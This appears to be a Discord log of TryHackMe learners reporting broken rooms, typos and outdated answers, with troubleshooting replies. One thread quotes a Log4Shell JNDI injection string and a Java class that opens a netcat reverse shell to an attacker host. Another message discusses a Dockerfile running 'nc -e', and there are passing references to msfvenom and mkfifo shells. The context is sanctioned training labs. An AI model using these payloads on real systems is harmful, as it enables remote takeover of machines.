No worries I rooted that box
Hi, I want to report a typo that is misleading in OWASP API Security Top 10 - 1 room, it asks you to put this Authorisation-Token header in header field, but the problem is it will get u 403 forbidden if u try it like this and you will be stuck unless you make it Authorization-Token using z instead of s
I cannot for the life of me get the attack boxes working in Microsoft Windows Hardening or Active Directory Hardening, it just loads a white screen on both, thought it was my shitty laptop but doing it on my desktop now too
anyone knows why i can never connect to the site in the vulnersity room? It shows me the connection cannot be made and then when using gobuster once again i get an error (which i am guessing is related to the one with the site)
Are you specifying the correct port?
just wanted to mention, that in the room 'cryptographyinfo' task 7 (in the security engineer pathway), when you let the MS screen reader (using latest Edge) play on the tables, it creates an empty column when jumping between entries, making it a 3x3 (excluding headers here) table from the 3x2 original. Not yet a well established hacker, but I think you could exploit this, no?
I can confirm this issue currently on my end too https://tryhackme.com/room/islandorchestration Team, could you please take a look and advise?
Jr. Penetration tester
"What is the shell ?" Room. I'm not able to get a response from the Windows server when i upload the php code and modify the url it keeps showing only white screen without connecting to my listener
Ill try again today to see.
Pay attention to the nmap scan. 🙂
Alrighty ty
Gave +1 Rep to @quaint sparrow
In the room, HaskHell (https://tryhackme.com/room/haskhell), when uploading the reverse shell, it results in an 'Internal Server Error'. I tried to upload it (in haskell format) a couple of times in the last few days, but the results were the same.
top write up referenced in the vid is dead in vulnversity
Which video? Most of the write ups are not hosted and simply linked to THM so they have no control which ones are up.
The video on the main page, I didn't use it, but was interested in how easy it could have been done. It references a walkthrough in the video, which is at the top of the list provided, but it no longer exists. Just thought I'd mention.
in throwback task 31 the first image is not loading or does not exist
Hello, I would like to report a small mistake in the room "Windows Fundamentals 1" in Task 2 - Windows Editions. The sentence "Then arrived Windows 10, which is the current Windows operating system version for desktop computers" is wrong because the current Win OP is Windows 11.
If you look at the bottom portion of the screen, you will see the room age. Thus, it was correct that Windows 10 is the current version when the room was released or submitted by the room creator.
idk if this is a bug or not but in https://tryhackme.com/room/linprivesc# Task 6 I was able to get the flag without actually becoming root
how???
if you are refering to task 7 that is intended but don't think so for task 6
Wait ill try it once more in a bit and
Yeah i might be mistaken so ill recheck
yeah it was task6
ah wait of course
so it's not?
yeah it is probably intended or technically a side effect of which binaries you can run as sudo
assuming you used one of those to read the flag
yeah
well if you have world readable on a file like it has it does not matter what tool you use to read it
that has to do with permissions to write in folders and stuff.. i.e generally not a huge problem
wait yeah, works fine if i use sudo
yuup as then it is running as root and therefore has permissions
also this one isnt really a bug, but in https://tryhackme.com/room/metasploitexploitation Task 2 -> I think it's supposed to say 10000 instead of 1000
submitting bug for room Grep.v.1.7
A few of the domains required to be accessed for this room to be completed are not displaying any content. Specifically, the domains load without error, but there is no html content being displayed. Inspecting the page and viewing source show nothing, but the domains do show up during a fuzz and are accessible.
You are right, using 1000 and 10000 is confusing in that sentence. But I would say the opposite: it's supposed to say 1000 instead of 10000
1-10000 is the default value for metasploit.
if you set 1-1000 (thinking it's the same as the 1000 nmap default ports), no because msf scan ports 1 to 1000 while nmap scan 1000 most used ports.
this makes more sense like this?
Does make sense ?
Hi!
Anyone else tried the Intro to Security Architecture room? I'm having issues with answer validation within the static-site; when I input the same values as the name and description, if accepts the former but flags the latter as incorrect...??
set firewall name <value X> description <value X>
That is intended I believe
Yeah that works
I think there is a badges related bug for the new Security Engineer Path. Didn't get the Intro and Risk Management badge. I create a ticket
https://tryhackme.com/room/ctf , not able to ping only this machine, vpn file alright, other machines working fine, only this machine, can anyone check , please
Have you tried other enumeration? Not all machines respond to pings
hmm i was thinking the same thing, then i thought this is a easy linux machine, but alright, i will keep that in mind, thank you
Gave +1 Rep to @hazy tiger
this could be a bug, I'm not sure.
room is tryhackme.com/room/burpsuitebasicsold, I'm told to check the website and explore it, but the site actually never responds, and it stays loading in a loop.
and right now I noticed the word old in the URL, why is that? is there a new module?
The BurpSuite module was updated recently, you can see the new module here https://tryhackme.com/module/learn-burp-suite. The basics room is the first one within the module
Hello everyone, this is my first message on Discord, I hope it's in the right section. I would like to report a "bug" regarding the "Soc Level 1" learning path. More specifically, the answers within the "Cyber Threat Intelligence" module -> "Threat Intelligence Tools" -> "UrlScan.io" ("What is TryHackMe's Cisco Umbrella Rank?" and "How many domains did UrlScan.io identify?") are not in line with the information found on the recommended website. Thanks.
so I have to leave that room and pursue the one you sent me?
Use the screenshots provided in the task.
I'm doing the John the Ripper room, I'd like to do the task from the AttackBox. Is the hashlists for the tasks already on the box somewhere? There seems to be some text missing under Task 4.
They are not.
Is there any way of accessing them without having to log on the website on the AttackMachine? For the .txt it's not too much of a hassle since you easily copy paste, however with the zip that becomes a little bit more cumbersome.
Not on the attackbox, no.
Unless when I have time I can send them to you via updog.
Hi Guys.
Not sure whats happening with the Upload Vulnerabilities room task 5.
Never had issues with shells and this is giving me a lot of hassle!
• Amended the shell with my IP (attack machine ip)
• Uploaded file to site.uploadvulns.thm.
• Travelled to the found directory on the site (it is the correct directory - i checked)
• Its not showing the upload? So i cant execute the php if its not uploading.
Any reason why the site isnt uploading?
Hi, there might be an error in Intro to log analysis task 6 question 2. It asks for how many http 200 responses were logged in total, using wc, manual counting and online counters return 52 lines but I got 71 by bruteforcing the answer
Or am I missing something?
i found a typo in a room on one of the learning paths, is this the appropriate channel to report it??
Yep!
https://tryhackme.com/room/principlesofsecurity
"Applications or services that handle information of multiple users need to be appropriately configured to only show information relevant to the owner is shown."
its more so the wording at the end seems to be a bit jumbled lol
https://tryhackme.com/room/securesdlc
Task 7 - last question:
"When do you typically carry out Vulnerability Assessments or Pentests?"
Not truly a bug, but I think the answer needs to be fixed. According to the paragraph directly above the question, the answer is "Operations and Maintenance" The correct answer is "Operations & Maintenance." Took me some needless troubleshooting to figure out the single character is the & symbol. It's not meant to be a trick question (it's not a CTF room by any means).
I would suggest updating the answer to reflect the text above it -- "Operations and Maintenance" to avoid confusion 🙂
https://tryhackme.com/room/authenticationbypass
Minor technical mistake: in task 4 of Authentication Bypass, there is a code snippet, which is then referred to as PHP code ("Because the above PHP code ..."). However, the code snippet seems to be JavaScript code. The PHP equivalent of this if statement would be substr($url, 0, 6) instead of url.substr(0, 6). Furthermore, the description of === seems to imply that == would not check casing. This example would also work/have a logic flaw with just the 'normal' ==.
:hammer: maheshmiskin#2227 has been banned.
Metasploit: Exploitation room, task 2, questions 1/2:
receiving the following error upon trying to run the netbios scanner: "[TARGET_IP] cannot load such file -- active_record/associations/has_many_association"
google tells me this is a Ruby on Rails issue, did using msfupdate bork something internally?
Are you using an ip or literally "Machine_ip" ?
Just something I thought I'd bring up with the introtologanalysis room, it looks like the IntroToLogAnalysis directory is missing on the Attackbox. It says it should be in the /root/Rooms directory but the only intro I see is the introdigitalforensics directory.
I found a bug in the SQLInjection-Room: https://tryhackme.com/room/sqlinjectionlm - in Blind SQLi - Boolean Based based section: By guessing the table name the last letter or to say character '_' is also valid (instead of 's')
EDIT: Ok, I enumerated another (the wrong) table 'analytics_referrers' which obviously doesn't hold user login data. Ok my bad... BUT the correct table is also susceptible to this bug, also with the last character 
Is there a bug with a question in the Processes 101 task for Linux Fundamentals 3? I keep getting incorrect answer even though it should just be the reverse of the above question, which I got right. The hint also suggests that I'm doing it correctly, so I can't figure out if it's actually me, or a bug.
Are you sure you're getting it right?
Fairly certain. I don't want to post answers here, but if the question above is "stop" this one is "start"
What are you typing?
apparently it was "enable" and not "start." I don't understand why that is. I'll have to do a Google search.
The answer is in the question.
We're wanting the service to start at boot.
Gotcha. I'll re-read the text. Thank you for that explanation.
Gave +1 Rep to @quaint sparrow
Sounds like msfupdate updated to a newer version of ActiveRecord, but either some metasploit code or one of their gems isn't compatible with the new version? I'd ask in Metasploit's Slack or submit a bug to them explaining the steps you did (1. Ran msfupdate, etc).
the actual ip
This is minor. In Introduction to Malware: https://tryhackme.com/room/malmalintroductory Task 12, half way down it says "After import. Navigate to "View -> Imports""
It should say "View -> Import" without the S at the end of Imports.
One more problem in that room. This one is more serious. Task 13. The screenshot shows a file in c:\program files (x86)\notepad ++. The Notepad++ folder is not in Program Files (x86) It is in Program files.
Here is a good screenshot
Here is the bad screenshot:
And another problem. That uninstall.exe file doesn't work with IDA. Here is the error:
Some more news. These issues don't prevent you from completing the room. That relies on files in the Task 13 folder. The issue is the instructions make it appear that we are supposed to perform the actions. Apparently, that's not possible.
Which is fine. It's just unclear the way it's written.
Just noticed this as well
Yep, we are aware, should be there soon 🙂
owasp top 10 room task 7 site not reachable. when i moved on to next talk it works.
Hey everyone on soc path 1 level one on the CTI part I'm on the opencti section and the opencti dash is not accessible having allowed the box to run for a long time to start the cti dash
Passive Reconnaissance, Task 5 (DNSDumpster) should be changed to reflect current THM layout. The answer is remote (Per Google), but that no longer shows on DNS Dumpster.
** Room WebOSINT has an outdated answer in task 7. **
(link: https://tryhackme.com/room/webosint)
In this task we need to use viewdns to get the thing in common between 2 websites. On the ||ip history|| is the link between the two. This is shown in my screenshot.
However, the answer expected is ||Liquid Web, L.L.C.|| even though the current history results show ||LIQUIDWEB||.
I spent 8 hours trying to do Task 7 in Network Services, at the end I had to google it because there's clearly something wrong with the room, when pasting the msfvenom payload on the telnet server IT WOULDN'T give me reverse shell,
I tried on my own Kali VM for about 4 hours and I could ping my machine from telnet, but NO MATTER HOW MANY times I tried, I could not receive the shell back, finally i tried for another 4 hours on the web attackbox, and finally it connected, but IT WOULDN'T give me the flag as you can see on the screenshot the connection was established but the shell wouldnt respond to any commands,
this is extremely frustrating, to just spend a whole day to finally find out the rooms buggy and I wasn't ever going to get the flag anyway, this almost made me give up on the whole cybersecurity thing, because I was getting imposter syndrome, but no, IT was THE BOX that didnt work! And now I'm just extremely burnout.
Looks like your command should be mkfifo instead of kfifo in Telnet.
Omg!
In Room Subdomain Enumeration https://tryhackme.com/room/subdomainenumeration
you should google "-site:www.tryhackme.com site:*.tryhackme.com" which should return a site starting with "b". However, it doesn't (only some starting with different letters). It can be searched using crt.sh, but this should be somehow fixed.
I'll forward that, thanks for reporting 🙂
Gave +1 Rep to @tired hare
Hello!
webenumerationv2 room's conclusion recommends to try out RPWebScanning (Walkthrough) room, but that room is private.
Bumping this one.
Hi,
i'm attempting to do the tomghost room, when i connect to ssh, do my things (nothing abnormal just basic linux commands) the ssh connection freeze and the ip didnt respond at every ping i try, so i need to reboot it (and it's the third time) and always the same thing after 2/3 min of connection. thanks for your time
To get your configuration working, make these configuration changes on the client:
/etc/ssh/ssh_config
Host *
ServerAliveInterval 100
Do you have a chance to try it?
hi, there is only Host * , no ServerAliveInterval
and can't edit because of permissions (still user yet, can't become root because of multiple crashes when i attempt something)
the machine seems very slow but i don't see any big process in the background or idk
In shodan room, Task 3, answers have changed(as of 12 Oct, 2023).
- Top operating system is now ||"5.7.39-42-log"|| and not ||"5.6.40-84.0-log"|| as mentioned in the Q hint.
- Nginx for Google ASN is now having more ||443/HTTPS w/ SSL|| ports than ||80/HTTP|| ports
- Top OS in Los Angeles is no longer ||Debian||, it's ||Ubuntu||.
echo "ServerAliveInterval 100" >> /etc/ssh/ssh_config, can you try that without using sudo or either way with sudo.
In room passiverecon, Task 6, 3rd most common port for nginx has changed from ||5001|| to ||5000||
i have finished the challenge with a lot of patience, response time was about 2/3s for each commands. so i'll try tmrw to know the source of that !
Task 12 "Scoping and Targeting"
We just chose to disable logging for out of scope traffic, but the proxy will still be intercepting everything. To turn this off, we need to go into the Proxy Options sub-tab and select "And URL Is in target scope" from the Intercept Client Requests section:
the image below it is showing to select the option in the RESPONSE section rather than the REQUEST section
room: CTF collection Vol.1
Task: 18, dig up the past
there is no more the backup on waybackmachine
can someone give me the flag?
whatever i found it
@oblique panther please don’t post answers here
I checked it just now and it is still there.
Okey, sorry.
Yes, in there.
Mh, wait I’ll send u a screenshot
I can send you the result I got as well, but I'll have to delete it the soonest so as not to give away the answer to others.
Ok!
really strange tho, now there is
thank u the same sorry for that
maybe i spelled bad the site
Probably the filtering?
After you copy and paste the site, you still need to filter the date.
room: Lian_Yu
is the video necessary to do the room?
not sure
No, it isn't.
Room : intromalwareanalysis
Task 6 can't be done as it refers to a report which doesn't exist anymore on Hybrid analysis.
Check the hash of the sample 'redline' on Hybrid analysis and check out the report generated on 9 Dec 2022. Check the Incident Response section of the report. How many domains were contacted by the sample?
there is no more report of Redline - 9 Dec 2022
Hi guys,
I'm on the "Blue" Room, Task 2.
I can't run the exploit idk why. I tried on my vm, reboot the machine 2 times and tried on attackthebox as well, nothing work for me.
did you set the LHOST?
Bruh
?
Nop 🙄
So it was listening on 192.168.xxx.xxx ? 😄
!dark
At complete beginner path
I can't download linenum.sh,linpeas.sh and lse.sh.
Also i don't have the permissions to copy it into a file or the ability to change the chmod. Or even wget through simple http server or even through scp.
Basic pentesting room
Also at Vulnversity room. I used a manual command to search for suid files
Because the remote machine didn't allow me to use any of the previously mentioned files.
Hi There, I lost my progress in burpsuite room, anyone had the same issue?
Module was updated, its a new module
okok, thanks!
Download the files into which directory? In the target?
/home/user
Does the user you have access to have write permissions on those folders you intend to write or save files into? Have you tried the /tmp folder?
It worked. Thanks
Gave +1 Rep to @unborn pulsar
How do you do this ? pinpoint, i think this is the experience.
Metasploit will tell you which IP it's listening on.
You'll also know it's not listening on tun0 as you won't set it.
Yes that's true, perfect.
Room: Intromalwareanalysis, Task 6, the question asks you to check the report on Hybrid Analysis created on 9 Dec 2022. This report no longer exists for the redline hash given. Further, finding a medium writeup, I checked the existing reports on Hybrid Analysis and none of them contain that number of contacted domains
Room: phishingemails2rytmuv, Task 5. The help article on help.netflix.com has slightly different wording than the answer ("email" instead of "message"). Without clicking "Hint" to view a random article, I would imagine most users would look to the official source of Netflix for this answer.
Hi @dusky junco, I just ran into the same issue as Sapient did on this room. I wanted to go through the full Jupyter 101 path as a quick refresher, but the support material link is down, and I cannot start Jupyter in the attack box. I've spent some time troubleshooting it, but as far as I can tell, the room is broken right now and can't be completed. Are you able to update it?
Hi everyone, I'm working on Blue box, and i'm trying to manually exploit eternal blue (with the old python exploit) .. When i'm trying to launch the exploit with user guest, i get an error : STATUS_ACCOUNT_DISABLED even with a restart of the VM, any hint to resolve my case ? (i manage to run the exploit correctly on others box..) Thanks ! ( i just tried with metasploit and it's working correctly..)
ROOM : THMREDLINE1.7.3 - Task 5
Not enough space on the machine to import the IoC file
Also maybe give a bit more resources on the machine, had to wait 1 hours to complete the scan and the redline analysis
Source Code Security https://tryhackme.com/room/sourcecodesecurity:
Task 8
The gitlab docs for gitlab_ci_yaml leads to a "page not found" error -
after connecting to the target system I have problems like this, the codes I wrote do not work. I have closed and restarted the room, changed my vpn but still the same. Can u help please
I can't move forward in any way. I'm stuck here.
Do a Google search on how to upgrade or stabilize netcat shells.
obviously this still is an issue... now you have to look up 9 Dec 2022, but this also isn't listed on hybrid analysis. Nevertheless great room.. 🙏 !
Did you figure out the issue with Upload Vulnerabilities task 5? I think I'm having the same issue in that step. I can bypass the client-side filtering, but I still can't upload a non-png file. I had other issues too. The first one was that the demo-subdomain was being rickrolled, which made it difficult to use in later steps. And subdomains references in task 3-4 seemed to be the wrong ones, out of lock-step.
Think that room has got a few issues tbh mate. I tried the same process on dummy machines and worked so had to be the room imo
Thanks! I'll just step over it for now.
Gave +1 Rep to @edgy sail
I swear https://tryhackme.com/room/btredlinejoxr3d needs an increase in disk space
gotta delete task 7 (endpoint content) to free space to do task 6 then restart the room to do task 7
Hi
Web Enumeration room, introduction to Nikto, link is pointing to 404 page
I want to report a bug at Burp Suite: Intruder room, Task 12 doesnt work unless you do it from attack box! Any idea?
Hello. I believe the Operating System Security room has an issue. I am supposed to use SSH to log in to some machine. It keeps telling me permission denied.
Hey All, doing the Year of the Jellyfish, yesterday the machine randomly lost connection and i was not able to ping it
Having the same issue today:
Is my ip blacklisted?
did you get this one from the room, yeah?
Can you nmap it?
Yeah i did, and no nmap is also not working sadly
It's like my ip is blacklisted somehow
Is it still up?
Lemme spawn a new instance and try again
Still cant ping lemme try the nmap
I am however able to nmap it
Upon trying to connect to the websites i get an error tho
oh nevermind
It somehow worked this time
Thanks 👍
Im working in Wreath Room. on step 17 when i put in ./nmap-USERNAME -sn 10.x.x.0/24 -oN scan-USERNAME, I get an error message stating: ./nmap-USERNAME: line 1 syntax error near unexpected token 'newline' and ./nmap_USERNAME: line 1: '<DOCTYPE HTML.' . Any idea why this is happening?
You downloaded the page from Github rather than the binary and are now trying to execute a HTML document 🙂
It was actually from the hyperlink on the lab
Which task?
17?
That should just give you the binary. Worked for me 🤷♂️
I've updated the link to be identical to the one on the Github page for the binary though. See if that works
I'd also suggest running file on things you download before trying to execute them 😆
at the bottom of room Web Enumeration v2 Task 13 is the link https://tryhackme.com/room/rpwebscanning but it says room is private.
WINFUN1.1 in Windows Fundamentals 1 is not working for some reason.
VPN is working just fine but can't ping the machine
Oh gods I do that all the time
You can't ping a windows machine by default.
It's a security setting that would need to be disabled so you can ping it.
I can ping the other machines .... i winfun2,3
Yes, I did think about that, and tried to connect with Remmina anyway. Didn't work, connection issue.
Yeah, the hint states the website doesn't work
Yes. it is. How am I supposed to get the flag and finish the room?
There is a bug in this room: https://tryhackme.com/room/bppenguin
When you remove the "unused accounts" and also remove home directories, etc passwd, group and any cronjobs (didnt exist in this case) the get-flags program seems to break, and youre unable to get the flag for this task.
Which is something you should do, not leave behind a bunch of crap
You don't need the flag anymore.
Nobody is you to spend bitcoin?
Actually, I withdraw my report. I didn't intend to waste any time.
No worries. 🙂
I need it because otherwise the task doesn't appear as completed.
Unless it's changed, the task doesn't require a flag.
Look, I've done Pyramid of Pain and as you can see the room is not marked as completed.
You must have missed a task?
Then it's a different sort of bug you got.
I sent a ticket yesterday.
Staff don't work weekends, if you E-mailed.
I know. I hope they'll answer next week
There's a problem with task 3 in the 'easypeasy' ctf room.
What's the problem?
Ah, I see the issue.
It's not asking for the port number, it's asking for the service.
thank you
Can you remove this please so as not to spoil it for other users? Thanks.
sorry..
Hey, I'd just like to mention that the room WebOSINT is not practically doable without previously written writeups (information has been modified and isn't as easy to get as initially planned (sometimes you can't even guess))
Example : you're supposed to check the number of times the domain "republicofkoffee.com" has changed names.
The answer is 4, but when you do the research with the given tool, you get over a thousand (I didn't count them)
this is the sad reality of osint challenges... they quickly get outdated or broken due to changes in how websites and stuff are handled
A mistake in room https://tryhackme.com/room/redteamnetsec, task 6, using proxy servers. In the example nmap command, the flag --proxies is missing
Tried to view the room, but it seems the link is either not working or incorrect.
Oops, made a mistake when typing it over from my laptop to my phone, should work now
Found another mistake, in room https://tryhackme.com/room/sandboxevasion, task 4, taking a nap, the example code is wrong. It should contain example code for sleeping but instead contains a copy of the example code from the querying network information section. There's also a mistake in that code; there are parentheses missing at the function call (should be isDomainController() == TRUE)
I can't find the lesson files on the attack box for this room
https://tryhackme.com/room/johntheripper0
using a share anywhere link to work around it but am I missing them entirely or is there some other way to transfer these files to work on in the attack box environment.
Are you using a VM?
yes Virtual Machine attack box in browser?
So no, you're using the attackbox.
The files aren't on the attackbox, I'm sure it's in the massive list I've gave Ben 😂
lol
sorry to add.. at first i was trying to see if i could vpn from my machine and use SCP to transfer them over .. but figured the in machine browser and a share link would work for now.. just rather use wget or scp or something to send them over but .. just wanted to help get it on the radar etc.
You could in theory.
But you'd need to be on the network
And I don't suggest putting your host on the VM.
I have an idea.
so vpn in my machine and then use wget or is that IP the location of the class files.. change file name per task accordingly?
That's my VM.
I'm serving a python server for you to download them.
Use the attackbox.
wget http://10.5.11.163:9000/secure.rar
for example
The file names are what they're called.
So if the python server is used in that directory with that name.
bummer the send anywhere link won't take the rar file.. the wget command
wget http://10.5.11.163:9000/secure.rar is hanging on connect
no way for me to vpn in on my client and SCP them over via ssh or anything?
On your host?
from the attack box..
I'm just gonna bite the bullet and log into the THM class room from the attack box and download that way .. just didn't want to log into the VM with my real account or anything for some reason
plus for some reason it keeps resizing and shrinking the browser while its loaded into a hard to read / use window
I wouldn't suggest that...
Do you have the resources for a VM on your laptop/Desktop?
not really use it while im traveling mostly i could but my plan was to just buy a new HD and back up the data on this one then install kali native to it
just haven't gotten around to it quite yet
Hi THM team,
There is a small typo in the following:
Complete Beginner (Learning Path) > Network Exploitation Basics > Nmap > Task 13: Firewall Evasion.
It can be found under the fourth bulletpoint --badsum where the following is being stated: "This is used to generate **in **invalid checksum for packets.".
I believe "in" should be "an".
I also sent this via the "feedback" page of THM.
Just letting you guys know!
hello
ello.... would recommend you describe the bug you are having and posting that here
Room: Remux The Tmux
URL: https://tryhackme.com/room/tmuxremux
Task: #3
Question: #9
The correct answer should be ctrl b shift } (Rotate current panel clockwise)
but I had to enter ctrl b shift { to receive a correct answer.
Clockwise and counter-clockwise CAN'T be the same command...
It accepts both it seems (I think tryhackme accepts questions that are like one character off or something, but in this case that means a completely different answer).
Ok. I thought you should know.
Yeah it is a bit confusing, I get wanting to accept like "Web Browser" & "web browser" or something, but having a single character difference here is all the difference
ok then have a nice one!
You too!
yeah that is an answer tolerance thingy shooting itself in the foot
Hello. This room is still broken
I noticed you spelled the username incorrectly as it should be sammie and not samie. Also, can you try adding -vv in your ssh command?
cd /
Hey everyone, I am currently working on the binary exploitation room and I cannot really connect to the virtual instance using the ip and port provided. Any ideas or help are really appreciated
[-] Opening connection to 10.10.5.167 on port 9007: Failed
[ERROR] Could not connect to 10.10.5.167 on port 9007
this is the error
I have tried to reset the machine but it does not seem to work
Can you provide a link to the room?
Can anyone help me on Willow? I'm getting stuck on something
You should explain your issue in #room-help for assistance
That was it. Thanks!
Gave +1 Rep to @unborn pulsar
Tried nc just now and it is working.
Hi there, someone can help me with this
I'm unable to join this room
I already clear browser history, cookies and tried in several browsers. All of them gave me the same problem.
Sub or streak of 7
Subscriber
The others rooms of Active Directory I’m already joined in but this one is giving me a lot of troubles to join.
Hi everyone, I am new in cybersecurity, there is a problem in Tryhackme website, there is a my-machine page/link and it is not working
^ "Start your first machine" task still links to this page
Sure..
Link?
Here are the tasks for access your own machine
And in every task there's a page linked as my-machine that is 404
cc @glad badger
That room is outdated. As a subscriber, there is an option to start a Kali machine from most room pages.
Thank you! well i know this feature too 😊
You're very welcome 🥳
Are there any plans to make the room private as its outdated?
Will be updated instead, to remove the my-machine references.
yea sure it is now working thank you
Gave +1 Rep to @unborn pulsar
Room: Meterpreter
Task 5 - Win4Meterpreter
Question 4: What is the NTLM hash of the jchambers user?
It looks like this is supposed to require migrating your process (per the hint), but you can actually grab that hash straight away with just the initial access.
Hey, I think the room https://tryhackme.com/room/insekube in Task 7 is broken: When I look at the Pod status with kubectl get pods, it remains in ImagePullBackOff.yaml imagePullPolicy: IfNotPresent in the yaml-file is set. Can someone please help me or check this? Many thanks 🙂
Room: Ustoun .The port 1433 never open so the room can’t be completed
have just been in Post-Exploitation Basics, the server kept dropping, was in another windows room earlier and found this as well
is this a common problem? or is it just a heavy day?
Oh is that the problem? I've never even gotten redline to load that list!!
I've even tried exporting the mans file to my own device and analysing there and even then the IOC report would not load...
I'll try again in a bit to see if that solves my issue, but yes it needs more space, CPU and RAM to run smoothly. I'm tired of waiting hours for something to not work...
I think OWASP Juice Box is "broken" at task 7. Will not return flags, (I'm not the only one having this issue) despite following instruction to a T, and exact copy for code. URL modification won't function to return flag either... watch other walkthroughs to ensure I was doing it correctly... doing via attackbox, but not working.
hai, room Kenobi smbclient not connected it was "do_connect: Connection to 10.10.221.48 failed (Error NT_STATUS_IO_TIMEOUT)" how to fix them
I also ran into this issue. I found a writeup with the correct answers, but the results from URLScan.io have definitely changed since the room was published.
Maybe not a bug but the second part of task 12 on this room (https://tryhackme.com/room/linprivesc) is given away in history of the missy user.
Having issues with Island Orchestration room... https://tryhackme.com/room/islandorchestration Only port 22 / ssh is open after 10+ mins. Have tried restarting the box. Write up says that there should be other services running. Also sounds like someone has hit this issue before (#room-bugs message)
Have you tried to do a Google search first? From the error message, it seems it is a timeout. How many minutes have you waited for the attached VM to spin up?
hey channel, I'm doing https://tryhackme.com/room/netsecchallenge and the last challenge seems to be broken. I see failed websocket connections from the target site. Doesn't work from both my Kali vm and the AttackBox
Quiet nmap?
the page doesn't seem to react to any types of scans, it's always 0%, even on nmap -A
What about -Sn?
same
-sn ?
same no reaction
Which environment you working in currently?
AttackBox, here is what I see https://postimg.cc/SY96Py5g
screenshot was made on my Kali, but on AttackBox it's the same
have no idea what was it, but now I've restarted both AB and VM, and it started working. Interesting thing is that I already restarted the vm and tried in different combinations - with kali and attackbox
so, I guess, problem is solved for me, but ... it's quite frustrating for a newbie like me, when you are not sure what is happening
Hello, hope this is the right room to post this... I'm working on the Intro to Malware Analysis room and Task 7 asks you to search for a hash on Hybrid Analysis and answer questions based on the report dated 9 Dec 2022. This report no longer appears to be available; there are 5 reports showing and the oldest is from March 2022. Thanks
Hello Joshua I was also working on the intro to malware Analysis to find the malware that was shown in the room I had to create an account on hybrid analysis and do the advanced search in the database.
this is the link to malware analysis https://hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa/5a31e18e7ca3e12fc20f8fc6
Hope that helps!!!
Ah, ok. Thank you
Gave +1 Rep to @sudden cedar
https://tryhackme.com/room/webosint
Task 2 Question 2 - Seems outdated. As it has changed.
||New: 9854014545 Old: 6613102107||
Task 2 Question 5 - Seems outdated.
||Panama -> Iceland||
Task 4 Question 3 - Seems outdated. Could maybe define a time range?
@dusky junco I'm currently doing your Docker Rodeo room. I believe I found a mistake in "Vulnerability #3: Uploading Malicious Docker Images". The malicious Dockerfile uses RUN nc -e ..., but RUN commands are executed at build time, so the attack would work if someone tried to docker build your Dockerfile (also an interesting attack vector). I imagine you had in mind CMD nc -e .... Also, apt-get update no longer works on jessie, maybe the example could be updated to buster (netcat on bullseye doesn't seem to support -e). Anyway, thanks for creating the room!
Gave +1 Rep to @dusky junco
Expose as of yesterday is having issues,
can ping using nmap and scan but cant access the website IP, cant use gobuster either and the THM relies on the website as its RCE through the website
Are you accessing with just the IP?
there is only the IP to access from for this box
Yeah, but have you tried to nmap it?
...
I was able to get a response in detail with this command
nap -sV -sT -V T5 -A --script vuln,exploit <IP>
but nothing else worked
Ok, and what was the response?
vulners exploits whats in the web, full detailed response, version, i also used whatweb and it worked but gobuster did not
/ dirbuster
Ok, but let's focus on Nmap, what were the ports returned?
?
i did this yesterday bro,
port 80, 443, 22, 3389 (I think 3389 not sure)
Are you sure 80 was returned?
yes
I looked up a review as well and its a whole ass website for it
I just booted up a machine and scanned it, port 80 isn't open.
idfk i went into a walk through for the exact same thm and it had the website up and loaded for an RCE or some shit like that
I see where i went wrong...
port 1337
In the room CTF LazyAdmin I found the directory /content/. There is the following text: More help at Tip for Basic CMS SweetRice installed. But when I click on the link I come to a website where it says: "
The domain Basic-cms.org may be for sale. Click here to inquire about this domain.
Basic-cms.org". Therefore I cannot read the information which I need for the solution of the CTF LazyAdmin.
What have you tried thus far to enumerate the target? Have you researched for vulnerabilities you can leverage or exploit to gain access to the target?
I'm not sure if this is the correct place to report it as it is not a bug per se, however, I'm getting a rather obscene gobuster output when doing the Expose Linux machine.
dirbuster/directory-list-2.3-medium.txt
And are you using a proxy/ school wifi/ vpn?
openvpn to connect from my kali, otherwise,no
im running it again to see if it will replicate
yep, same thing happens, idk how or why
Got a bug to report to who should i send image
Whats the bug?
In https://tryhackme.com/room/fileinc - lab1, if you include lab1.php it will crash the attack box.
Done!
Hi All!
I could really use a sniff-test here (did something get patched?):
on https://tryhackme.com/room/shaker I'm not able to get the revshell callback to work with ||${${::-j}ndi:ldap://<ATK-IP>:1389/myRevShell2}||
- the ||logsXXXX/ folder doesn't show any errors||
- I can see the ||LDAP & HTTP requests|| coming in and going out successfully:
- ||jndi-exploit-ldap-1 | Send LDAP reference result for myRevShell2 redirecting to http://<ATK-IP>:8000/myRevShell2.class||
- ||jndi-exploit-jndi-http-1 | <ATK-IP> - - [18/Nov/2023 15:33:15] "GET /myRevShell2.class HTTP/1.1" 200 -||
- and I've tried 2 different ||java class revshell|| formulations (using: ||/bin/sh||), e.g.:
||public class myRevShell {
static {
try {
java.lang.Runtime.getRuntime().exec("nc <ATTACKER_IP> <NC_PORT> -e /bin/sh");
} catch (Exception err) {
err.printStackTrace();
}
}
}||
@gleaming shadow hints?
maybe, give me a sec to read
close, but there's no ||nc|| on that box. Also the revshell itself is a bit tricky
structure looks alright though
might need to handle the socket on the java side as well 🙂
take a look at https://www.revshells.com 🙂
@misty gull if you need more hints, you may ask me in #room-hints or #room-help
TYVM.
I had tried room-hints, but it seems to be very noisy and thus hit-or-miss
Must've missed it, sorry. In any case, that room is one of mine 🙂
Could I get a check on this room: https://tryhackme.com/room/nerdherd
The issue is in regard to enumerating the SMB share. Every one of the write-ups uses either enum4linux or rpcclient to retrieve the username. I could not get either tool to work, and couldn't find any alternative enum4linux scripts that could complete the task. This made it impossible for me to complete the challenge without looking into the writeup for the username.
Edit: Using the Kali VM.
any updates on HoloLive room. Downloaded the hololive VPN but it's just empty file.
In the room Splunk: Data Manipulation, Task 6 Event Boundaries (https://tryhackme.com/room/splunkdatamanipulation), under "Fixing the Event Boundary" there is a typo in the URL for regex101.com. The text is "reg101.com", the URL is tryhackme.com/room/reg101.com and if you go to reg101.com it redirects to a domain squatting website.
Hi there' i have a bug to report please check out this link > https://tryhackme.com/room/aocvolatilityforlinux
This is a private room.
Okay so why we are not allowed use ?
Could be made private as it's old.
Hmm okay thankz
Network Services
Task 7
Great! It's an open telnet connection! What welcome message do we receive?
There is something wrong? I fill out the answer but it registers as wrong?
How did you connect to the telnet service? Was there a welcome banner?
Did this not work? Haven't done the room myself though.
Rebooted the machines to get it to work.
Some small typos in https://tryhackme.com/room/threatemulationintro
Task 2:
- Has the technology in use [been] properly configured and [is delivering] value to the business?
Task 5+6: Mini-sites > Introduction:
